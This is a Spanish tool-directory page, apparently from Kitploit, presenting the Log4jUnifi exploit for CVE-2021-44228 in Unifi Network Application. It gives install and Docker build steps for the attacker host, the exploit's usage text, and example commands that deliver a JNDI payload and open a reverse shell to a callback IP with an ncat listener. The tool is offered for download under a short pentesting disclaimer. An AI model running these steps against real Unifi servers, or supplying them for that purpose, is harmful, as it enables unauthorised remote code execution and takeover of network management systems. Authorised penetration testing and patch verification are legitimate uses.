Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4jUnifi — Explotando CVE-2021-44228 en Unifi Network Application para ejecución remota de código y más. | Kitploit
Herramientas/GitHubGitHub/puzzlepeaches/log4junifi
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubpuzzlepeaches/log4junifi

Log4jUnifi

Explotando CVE-2021-44228 en Unifi Network Application para ejecución remota de código y más.

Ver Repositorio
17031hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Log4jUnifi

Explotando CVE-2021-44228 en Unifi Network Application para ejecución remota de código y más.

  • Otro Log4j en el fuego: Unifi

¿Por qué?

Las pruebas de concepto para esta vulnerabilidad están dispersas y deben realizarse manualmente. Este repositorio automatiza el proceso de explotación. Consulta la publicación del blog anterior para obtener orientación sobre post-explotación.

Instalación

Este repositorio puede usarse manualmente o con Docker.

Instalación manual

Para descargar y ejecutar el exploit manualmente, sigue los siguientes pasos. Primero, asegúrate de que Java y Maven estén instalados en tu host atacante. Para hacerlo usando apt en sistemas operativos basados en Debian, ejecuta el siguiente comando:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Clona el repositorio de GitHub e instala todos los requisitos de Python:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && pip3 install -r requirements.txt

Desde la raíz del repositorio Log4jUnifi, compila el proyecto Rogue-Jndi usando el siguiente comando:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Instalación con Docker

Primero, asegúrate de que Docker esté instalado en tu host atacante. (No te voy a guiar a través de este proceso)

Después, ejecuta el siguiente comando para clonar el repositorio y construir la imagen de Docker que usaremos.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && docker build -t log4junifi .

Para ejecutar el contenedor, ejecuta un comando similar al siguiente con tus banderas de línea de comandos añadidas. Ten en cuenta que el contenedor no capturará la reverse shell. Necesitas crear un listener de ncat en una sesión de shell separada:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jUnifi/loot -p 8090:8090 -p 1389:1389 log4junifi \ 
    -u https://unifi.acme.com:8443 -i 192.168.1.1 -p 4444

Uso

root@kitploit:~
usage: exploit.py [-h] -u URL -i CALLBACK -p PORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Unifi Network Manager base URL
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.

Ejemplos

Obtén una reverse shell usando la herramienta instalada en tu sistema local:

root@kitploit:~
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444

Descargo de responsabilidad

Esta herramienta está diseñada para usarse durante pruebas de penetración; el uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no se hacen responsables de cualquier uso indebido de este programa.

Descargar herramienta